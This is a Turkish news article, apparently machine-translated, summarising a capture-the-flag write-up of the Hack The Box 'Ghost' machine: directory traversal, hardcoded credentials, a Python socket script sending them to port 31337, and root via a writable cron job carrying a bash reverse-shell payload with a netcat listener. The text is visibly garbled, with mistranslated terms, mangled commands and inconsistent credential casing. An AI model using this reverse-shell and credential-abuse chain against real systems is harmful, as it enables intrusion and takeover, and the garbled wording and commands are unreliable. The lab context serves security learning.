“Hayalet” meydan okumasını hackledi


Siber güvenlik araştırmacısı “0xdf”, penetrasyon test becerilerini geliştirmek için önde gelen bir platform olan Hack the Box’taki (HTB) “Hayalet” Mücadelesini kırdı ve Gitlab bloglarında kapsamlı bir teknik arıza paylaştı.

Yazma, keşif, kırılganlık sömürüsü ve ayrıcalık artışı yoluyla gezinen sofistike bir saldırı, sonuçta sistemin bayrağını-dijital bir zafer kanıtı olduğunu iddia ediyor.

Bu başarı sadece 0xDF’nin etik hackerlar arasındaki itibarını değil, aynı zamanda gerçek dünyadaki tehditlere karşı savunmalarını güçlendirmeyi amaçlayan sistem yöneticileri için kritik bir ders olarak da hizmet vermektedir.

– Reklamcılık –
Google HaberleriGoogle Haberleri

Hayalet gibi kutu zorlukları, bir bilgisayar korsanının yaratıcılığını test eden gizli kusurlarla tamamlanan kurumsal sınıf sistemlerini taklit etmek için titizlikle hazırlanmıştır.

0xDF’nin hassasiyetle detaylandırılmış başarısı, hedefin tuhaflıklarına göre tasarlanmış endüstri standart araçları NMAP, metasploit ve ısmarlama komut dosyalarının bir karışımını kullanıyor.

Siber saldırıların giderek daha sofistike büyüdüğü bir dönemde, bu istismar, kötü niyetli aktörler bunlardan yararlanmadan önce güvenlik açıklarını ortaya çıkaran beyaz şapka hackerlarının değerinin altını çiziyor.

İhlalin Haritalanması: İlk Erişim’e Keşif

Yolculuk, herhangi bir penetrasyon testinde temel bir adımla başladı: keşif. 0xdf bir NMAP taraması (nmap -sc -sv -p- ) Açık portlar ve koşu hizmetleri için hayalet sistemini süpürmek.

Tarama, 80 numaralı bağlantı noktasında bir web sunucusunu, muhtemelen bir Apache veya Nginx örneğini ve Ismarlama işlevselliğine işaret eden standart olmayan bir bağlantı noktası olan 31337 bağlantı noktasını dinleyen esrarengiz bir özel hizmeti ortaya çıkardı.

Web sunucusunu araştıran 0xdf, zayıf giriş dezenfektanından kaynaklanan bir dizin geçiş güvenlik açığı (/ghost/../) belirledi. Bu kusur, hassas dosyaları ortaya çıkararak web kökünün ötesinde gezinmeye izin verdi.

Geri alınan dosyalar arasında bir altın madeni içeren bir yapılandırma komut dosyası vardı: sabit kodlu kimlik bilgileri (admin: gh0stp@ss).

Bunlarla donatılmış 0xdf, kimlik doğrulamalı komutları işlemek için tasarlanmış hafif bir TCP dinleyici olduğu kanıtlanan 31337 Hizmetine döndü.

Basit bir soket bağlantısı kullanarak, Whoami gibi temel komutları doğruladılar ve test ettiler ve düşük ayrıcalıklı bir dayanağı doğruladılar. Bu etkileşimi kolaylaştırmak için 0xdf bir Python betiği hazırladı:

import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("target_ip", 31337))
s.send(b"admin:gh0stP@ss\nwhoami\n")
response = s.recv(1024).decode()
print(response)

Bu ilk ihlal, sınırlı olmakla birlikte, daha derin sızma zeminini ayarlayarak, tek bir yanlış adım sabit kodlama kimlik bilgilerinin bir sistemin güvenliğini nasıl çözebileceğini vurguladı.

Zafere yükseltme: Kullanıcıdan kök kontrolüne

Bir dayanak güvencesi ile bir sonraki zorluk, Penetrasyon testinde kritik bir beceri ayrıcalığıydı.

TCP hizmeti, yardımcı programını sınırlayarak kısıtlı bir kullanıcı hesabı altında çalıştı. Ölümsüz, 0xdf, her dakika kök olarak yürütülen /etc/cron.d/ adresinde yazılabilir bir cron işini ortaya çıkararak yükseltme vektörleri için sistemi temizledi.

Bu yanlış yapılandırma Linchpin’di. Ters kabuk yükü ekleyerek (Bash -i> &/dev/tcp//4444 0> & 1) Cron Job tarafından çağrılan bir komut dosyasına, makinelerine bir geri arama tetiklediler.

Anlar içinde, saldırganın ucundaki bir Netcat dinleyicisi (NC -LVNP 4444) bir kök kabuğu vererek hayata geçti.

Oradan, bayrağı bulmak ve yakalamak – tipik olarak depolanan /root/flag.txt – zorluğun tamamlanmasını işaretleyen bir formalite idi.

Artış, klasik bir kusurdan yararlandı: planlanan görevlerde aşırı izinler, birçok gerçek dünya sistemini rahatsız eden bir güvenlik açığı. 0xDF’nin metodik yaklaşımı, otomasyonu manuel analizle harmanlayan, küçük bir giriş noktasını toplam hakimiyete dönüştürdü.

Siber güvenlik öğrenimi için bir işaret

0xDF’nin yazımının teknik zenginliği onu göze çarpan bir kaynak haline getiriyor. BT, şirketleri ve hükümetleri hedefleyen ihlallerde görülen gerçek dünyadaki saldırı zincirlerinin keşif, sömürü ve ayrıcalık artışını yansıtıyor.

Hevesli çatı katları için, yazı komutlar ve mantıkla tamamlanan tekrarlanabilir bir oyun kitabı sunar.

Sistem yöneticileri için bu bir uyandırma çağrısıdır: dizin geçiş, sabit kodlu kimlik bilgileri ve LAX cron izinleri teorik riskler değil, sömürülebilir gerçeklerdir.

Bu haberi ilginç bul! Anında güncellemeler almak için bizi Google News, LinkedIn ve X’te takip edin!



Source link